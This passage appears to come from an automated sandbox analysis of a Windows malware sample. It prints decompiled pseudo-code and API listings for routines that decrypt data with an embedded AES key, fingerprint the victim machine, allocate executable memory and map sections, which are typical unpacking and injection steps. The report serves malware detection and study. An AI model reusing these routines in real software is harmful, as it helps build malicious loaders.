						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t65 =  &_v36; // 0x502779
						_t141 =  *_t65;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						_t51 =  &_v36; // 0x502779
						memcpy( *_t51 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}

0x00504ea5
0x00504eab
0x00504ead
0x00504ec7
0x00504ecb
0x00504ece
0x00505143
0x0050514a
0x0050514a
0x00504ed4
0x00504ee9
0x00504eeb
0x00504eef
0x00504ef2
0x00505133
0x0050513d
0x00000000
0x0050513d
0x00504ef8
0x00504f03
0x00504f08
0x00504f0d
0x00504f10
0x00504f17
0x00504f1e
0x00504f21
0x00505123
0x00505123
0x0050512d
0x00000000
0x0050512d
0x00504f37
0x00504f3b
0x00504f3e
0x00504f41
0x00504f49
0x00504f4c
0x00504f55
0x00504f5b
0x00504f65
0x00504f6c
0x00504f6c
0x00504f7e
0x00504f89
0x00504f97
0x00504f9c
0x00504fa1
0x00504fa4
0x00504fa9
0x00504fb3
0x00504fb6
0x00504fb9
0x00504fcf
0x00504fd3
0x00504fd6
0x00505121
0x00000000
0x00505121
0x00504fed
0x0050503e
0x00505001
0x00505009
0x0050500e
0x0050501c
0x00505025
0x0050502e
0x0050502e
0x0050503c
0x0050503c
0x00505042
0x00505046
0x00505046
0x0050504c
0x00000000
0x00000000
0x0050504e
0x00505054
0x005050fb
0x005050fb
0x005050fe
0x0050510b
0x0050510b
0x0050510f
0x00000000
0x00000000
0x00505104
0x00505108
0x00505108
0x0050510a
0x0050510a
0x00505114
0x0050511b
0x0050511d
0x00000000
0x0050511d
0x0050505a
0x0050505c
0x0050505c
0x0050506f
0x00505075
0x00505080
0x00505082
0x00505086
0x00505088
0x00505088
0x0050508d
0x0050508f
0x0050508f
0x0050508d
0x00505094
0x00505098
0x00505098
0x005050a2
0x005050a8
0x005050ad
0x005050b0
0x005050b0
0x005050b3
0x005050bd
0x005050c5
0x005050ca
0x005050d8
0x005050d8
0x005050ec
0x005050f0
0x005050f0

APIs

RtlAllocateHeap.NTDLL(00000000,63699BC3,0050A380), ref: 00504EC7
RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00504EE9
memset.NTDLL ref: 00504F03

Part of subcall function 00501000: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,00504F1C,73797325), ref: 00501011
Part of subcall function 00501000: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 0050102B

CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00504F41
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00504F55
FindCloseChangeNotification.KERNELBASE(?), ref: 00504F6C
StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00504F78
lstrcat.KERNEL32(?,642E2A5C), ref: 00504FB9
FindFirstFileA.KERNELBASE(?,?), ref: 00504FCF
CompareFileTime.KERNEL32(?,?), ref: 00504FED
FindNextFileA.KERNELBASE(00503EAC,?), ref: 00505001
FindClose.KERNEL32(00503EAC), ref: 0050500E
FindFirstFileA.KERNEL32(?,?), ref: 0050501A
CompareFileTime.KERNEL32(?,?), ref: 0050503C
StrChrA.SHLWAPI(?,0000002E), ref: 0050506F
memcpy.NTDLL(y'P,?,00000000), ref: 005050A8
FindNextFileA.KERNELBASE(00503EAC,?), ref: 005050BD
FindClose.KERNEL32(00503EAC), ref: 005050CA
FindFirstFileA.KERNEL32(?,?), ref: 005050D6
CompareFileTime.KERNEL32(?,?), ref: 005050E6
FindClose.KERNELBASE(00503EAC), ref: 0050511B
HeapFree.KERNEL32(00000000,y'P,73797325), ref: 0050512D
HeapFree.KERNEL32(00000000,?), ref: 0050513D

Strings

y'P, xrefs: 00505123, 005050A2, 005050FB, 005050A7

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
String ID: y'P
API String ID: 2944988578-365914460
Opcode ID: c741098b64e431d86ab9485678f1340a0657155e335fb3fccc752f5b6a3ca633
Instruction ID: b0f54f8092777ee5799bf1a6b3be6f73e6817da7faaa4083ede87446cf2ac64e
Opcode Fuzzy Hash: c741098b64e431d86ab9485678f1340a0657155e335fb3fccc752f5b6a3ca633
Instruction Fuzzy Hash: 41812A71D0020AAFDF11DFA5DC98AEFBBB9FB54300F104466E505E62A1E7719A48DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 005035A1, Relevance: 19.7, APIs: 13, Instructions: 163
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E005035A1(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				BYTE* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				int _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				BYTE* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0x50a0b8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0x50a0dc() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x10
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E00505C4E(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0x50a0a8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 =  &(_t102[_t90]);
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E00502A03(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}

0x005035aa
0x005035b0
0x005035b3
0x005035b9
0x005035b9
0x005035bb
0x005035bd
0x005035c0
0x005035c6
0x005035c7
0x005035c8
0x005035ce
0x005035d3
0x005035d9
0x005035e1
0x0050373e
0x005035e7
0x005035e9
0x005035f2
0x005035f7
0x00503609
0x0050360c
0x00503610
0x00503617
0x0050361b
0x00503623
0x00503729
0x00503629
0x00503629
0x0050362d
0x0050362e
0x00503630
0x0050363b
0x00503715
0x00503641
0x00503641
0x00503644
0x0050364a
0x00503650
0x00503650
0x00503658
0x0050365c
0x0050365f
0x00503706
0x00503665
0x0050366b
0x0050366e
0x00503671
0x00503673
0x00503676
0x00503679
0x0050367b
0x0050367b
0x00503685
0x0050368a
0x0050368d
0x00503690
0x00503692
0x0050369b
0x005036c5
0x0050369d
0x005036ae
0x005036ae
0x005036cd
0x00000000
0x00000000
0x005036cf
0x005036d2
0x005036d5
0x005036d9
0x00000000
0x005036db
0x005036ea
0x005036f0
0x005036f8
0x005036f8
0x00000000
0x005036d9
0x005036dd
0x005036e5
0x005036e8
0x005036ff
0x00000000
0x00000000
0x00000000
0x005036e8
0x0050365f
0x00503718
0x0050371b
0x0050371b
0x00503730
0x00503730
0x00503748

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,00501B16,00000001,00506301,00000000), ref: 005035D9
memcpy.NTDLL(00501B16,00506301,00000010,?,?,?,00501B16,00000001,00506301,00000000,?,00505B47,00000000,00506301,?,00000000), ref: 005035F2
CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 0050361B
CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 00503633
memcpy.NTDLL(00000000,00000000,02FE9630,00000010), ref: 00503685
CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,02FE9630,00000020,?,?,00000010), ref: 005036AE
CryptDecrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,02FE9630,?,?,00000010), ref: 005036C5
GetLastError.KERNEL32(?,?,00000010), ref: 005036DD
GetLastError.KERNEL32 ref: 0050370F
CryptDestroyKey.ADVAPI32(00000000), ref: 0050371B
GetLastError.KERNEL32 ref: 00503723
CryptReleaseContext.ADVAPI32(?,00000000), ref: 00503730
GetLastError.KERNEL32(?,?,?,00501B16,00000001,00506301,00000000,?,00505B47,00000000,00506301,?,00000000,00506301,00000000,02FE9630), ref: 00503738

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
String ID:
API String ID: 1967744295-0
Opcode ID: 8b5adbf75345ece0e46a5f9ebd229b59926c8b5f26d0f3e7eaa3ddf47e57492d
Instruction ID: af5197228b3e3954ce084e67a8be27f113228b4092f2bd5ba7ebd2d3397f8863
Opcode Fuzzy Hash: 8b5adbf75345ece0e46a5f9ebd229b59926c8b5f26d0f3e7eaa3ddf47e57492d
Instruction Fuzzy Hash: 9F514AB1900209FFDB10DFA9DC88AAEBFBDFB54340F108425F905E6290D7319E589B61

Uniqueness

Uniqueness Score: -1.00%

Function 00503946, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 102
memoryCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00503946(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				intOrPtr _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x50a2c8; // 0xbd092303
					_v12 = _t59;
				}
				_t64 = _t69;
				E0050354E( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x50a2cc ^ 0x4c0ca0ae;
				} else {
					_t5 =  &_v8; // 0x502f3f
					GetUserNameW(0, _t5);
					_t6 =  &_v8; // 0x502f3f
					_t50 =  *_t6;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x50a290, 0, _t50 + _t50);
						if(_t62 != 0) {
							_t7 =  &_v8; // 0x502f3f
							if(GetUserNameW(_t62, _t7) != 0) {
								_t8 =  &_v8; // 0x502f3f
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E00503F12( *_t8 +  *_t8, _t63);
							}
							HeapFree( *0x50a290, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x50a290, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E00503F12(_v8 + _v8, _t63);
						}
						HeapFree( *0x50a290, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}

0x00503946
0x0050394e
0x00503954
0x00503957
0x0050395a
0x0050395c
0x00503961
0x00503961
0x00503967
0x00503969
0x00503976
0x005039d7
0x00503978
0x00503978
0x0050397d
0x00503983
0x00503983
0x00503988
0x00503996
0x0050399a
0x0050399c
0x005039a9
0x005039ab
0x005039b0
0x005039b7
0x005039b7
0x005039c2
0x005039c2
0x0050399a
0x00503988
0x005039d9
0x005039df
0x005039e9
0x005039eb
0x005039f0
0x005039ff
0x00503a03
0x00503a0e
0x00503a15
0x00503a1c
0x00503a1c
0x00503a28
0x00503a28
0x00503a03
0x00503a31
0x00503a33
0x00503a36
0x00503a38
0x00503a3b
0x00503a3e
0x00503a48
0x00503a4c
0x00503a50

APIs

GetUserNameW.ADVAPI32(00000000,?/P), ref: 0050397D
RtlAllocateHeap.NTDLL(00000000,?/P), ref: 00503994
GetUserNameW.ADVAPI32(00000000,?/P), ref: 005039A1
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00502F3F,?,?,?,?,?,005044F9,?,00000001), ref: 005039C2
GetComputerNameW.KERNEL32(00000000,00000000), ref: 005039E9
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 005039FD
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00503A0A
HeapFree.KERNEL32(00000000,00000000), ref: 00503A28

Strings

?/P, xrefs: 00503978, 00503983, 0050399C, 005039AB, 0050397B, 0050398C, 0050399F
?/P, xrefs: 00503A10, 005039EB, 00503A05, 005039E3

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID: ?/P$?/P
API String ID: 3239747167-1958642096
Opcode ID: 61f7706712a476ae973174f03e2d9bbd9767eee81f20788634e556021b0624ea
Instruction ID: 1ac15ff0d049d2cc42d5312ebd0a22343fed731b5d79f2296ae084492361bca2
Opcode Fuzzy Hash: 61f7706712a476ae973174f03e2d9bbd9767eee81f20788634e556021b0624ea
Instruction Fuzzy Hash: EB314B75A0020AEFDB11DFA9DC85A6EBBFDFB58300F508429E545D3261D770EE04AB10

Uniqueness

Uniqueness Score: -1.00%

Function 6C55F1E7, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000093A,00003000,00000040,0000093A,6C55EC40), ref: 6C55F2A4
VirtualAlloc.KERNEL32(00000000,00000171,00003000,00000040,6C55ECA0), ref: 6C55F2DB
VirtualAlloc.KERNEL32(00000000,0000E816,00003000,00000040), ref: 6C55F33B
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6C55F371
VirtualProtect.KERNEL32(6C500000,00000000,00000004,6C55F1C6), ref: 6C55F476
VirtualProtect.KERNEL32(6C500000,00001000,00000004,6C55F1C6), ref: 6C55F49D
VirtualProtect.KERNEL32(00000000,?,00000002,6C55F1C6), ref: 6C55F56A
VirtualProtect.KERNEL32(00000000,?,00000002,6C55F1C6,?), ref: 6C55F5C0
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6C55F5DC

Memory Dump Source

Source File: 00000000.00000002.918341548.000000006C55E000.00000040.00020000.sdmp, Offset: 6C55E000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 002b6e9d8b8b912e427009376430405a75685ee57e1abf73e049f3572918e976
Instruction ID: 4ecd6859f635121903e48babe34bada4519fc3171799d4d3917332ba8c4ad7a9
Opcode Fuzzy Hash: 002b6e9d8b8b912e427009376430405a75685ee57e1abf73e049f3572918e976
Instruction Fuzzy Hash: 69D18076500100DFDB02CF14CCA0B5277B6FF88314B194599ED09DFB9AE771A86ACBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6C501979, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E6C501979(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6C502210();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6c5041d0;
				_push(_t15 + 0x6c50505e);
				_push(_t15 + 0x6c505054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6C50220A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x6c5041c0, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x6c501979
0x6c501982
0x6c501986
0x6c50198c
0x6c501991
0x6c501996
0x6c501999
0x6c50199c
0x6c5019a1
0x6c5019a2
0x6c5019a5
0x6c5019b0
0x6c5019b7
0x6c5019bb
0x6c5019bd
0x6c5019be
0x6c5019c1
0x6c5019c6
0x6c5019d0
0x6c5019d2
0x6c5019d2
0x6c5019e6
0x6c5019ec
0x6c5019f0
0x6c501a40
0x6c5019f2
0x6c5019fb
0x6c501a11
0x6c501a19
0x6c501a2b
0x6c501a2f
0x00000000
0x00000000
0x6c501a1b
0x6c501a1e
0x6c501a23
0x6c501a25
0x6c501a25
0x6c501a06
0x6c501a08
0x6c501a31
0x6c501a32
0x6c501a32
0x6c5019fb
0x6c501a48

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6C50176E,0000000A,?,?), ref: 6C501986
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6C50199C
_snwprintf.NTDLL ref: 6C5019C1
CreateFileMappingW.KERNELBASE(000000FF,6C5041C0,00000004,00000000,?,?), ref: 6C5019E6
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C50176E,0000000A,?), ref: 6C5019FD
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6C501A11
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C50176E,0000000A,?), ref: 6C501A29
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C50176E,0000000A), ref: 6C501A32
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C50176E,0000000A,?), ref: 6C501A3A

Memory Dump Source

Source File: 00000000.00000002.917927318.000000006C501000.00000020.00020000.sdmp, Offset: 6C500000, based on PE: true

Associated: 00000000.00000002.917919744.000000006C500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917946267.000000006C503000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917967600.000000006C505000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.917987894.000000006C506000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: 92fc2cd8ce0867b35f40f40d45fc675ff2403b420c9073428821fba8a17719cf
Instruction ID: 9cd8e2457fb2ed31a74fb831bc923424d3701bc983a03dc0d6f5690a96a0bb89
Opcode Fuzzy Hash: 92fc2cd8ce0867b35f40f40d45fc675ff2403b420c9073428821fba8a17719cf
Instruction Fuzzy Hash: E321ACB2701108FFDB11AFA9CC85E9F77BCEB89358F114429FA11D7580D73099448BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00503CA1, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E00503CA1(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E00505C4E(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E00502A03(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x00503cae
0x00503caf
0x00503cb0
0x00503cb1
0x00503cb2
0x00503cb6
0x00503cbd
0x00503ccc
0x00503ccf
0x00503cd2
0x00503cd9
0x00503cdc
0x00503cdf
0x00503ce2
0x00503ce5
0x00503cf0
0x00503cf2
0x00503cfb
0x00503d03
0x00503d05
0x00503d17
0x00503d21
0x00503d25
0x00503d34
0x00503d38
0x00503d41
0x00503d49
0x00503d49
0x00503d4b
0x00503d4b
0x00503d53
0x00503d59
0x00503d5d
0x00503d5d
0x00503d68

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00503CE8
NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 00503CFB
NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00503D17

Part of subcall function 00505C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00503FAA), ref: 00505C5A

NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00503D34
memcpy.NTDLL(00000000,00000000,0000001C), ref: 00503D41
NtClose.NTDLL(00000000), ref: 00503D53
NtClose.NTDLL(00000000), ref: 00503D5D

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 845f04b17322f6bb38e189480556c33dd6b728c6fcc5e60dd80a99d29cd8b1a2
Instruction ID: 2772470bcab70834bee2d353cadf8ba41e2a31c22e59cb3f623b7349fa7c2266
Opcode Fuzzy Hash: 845f04b17322f6bb38e189480556c33dd6b728c6fcc5e60dd80a99d29cd8b1a2
Instruction Fuzzy Hash: 7621E3B2A00219BBDB119FA5CC89ADEBFBDFB58780F104026F905E6160D7719A44DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6C5018D1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E6C5018D1(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E6C501B89(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x6c5018da
0x6c5018e1
0x6c5018e2
0x6c5018e3
0x6c5018e4
0x6c5018e5
0x6c5018f6
0x6c5018fa
0x6c50190e
0x6c501911
0x6c501914
0x6c50191b
0x6c50191e
0x6c501925
0x6c501928
0x6c50192b
0x6c50192e
0x6c501933
0x6c50196e
0x6c501935
0x6c501938
0x6c50193e
0x6c501943
0x6c501947
0x6c501965
0x6c501949
0x6c501950
0x6c50195e
0x6c50195e
0x6c501947
0x6c501976

APIs

NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000,?), ref: 6C50192E

Part of subcall function 6C501B89: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6C501943,00000002,00000000,?,?,00000000,?,?,6C501943,00000000), ref: 6C501BB6

memset.NTDLL ref: 6C501950

Strings

@, xrefs: 6C50191E

Memory Dump Source

Source File: 00000000.00000002.917927318.000000006C501000.00000020.00020000.sdmp, Offset: 6C500000, based on PE: true

Associated: 00000000.00000002.917919744.000000006C500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917946267.000000006C503000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917967600.000000006C505000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.917987894.000000006C506000.00000002.00020000.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: 00af36b428359ca772932176b9c6d2f97bd417452e06b8a4b42cf2ee787d1e4b
Instruction ID: bf1fe3ebbbd5acb3caec16d1d963839fbda3c3e31e948767fa7b5e366eef6aff
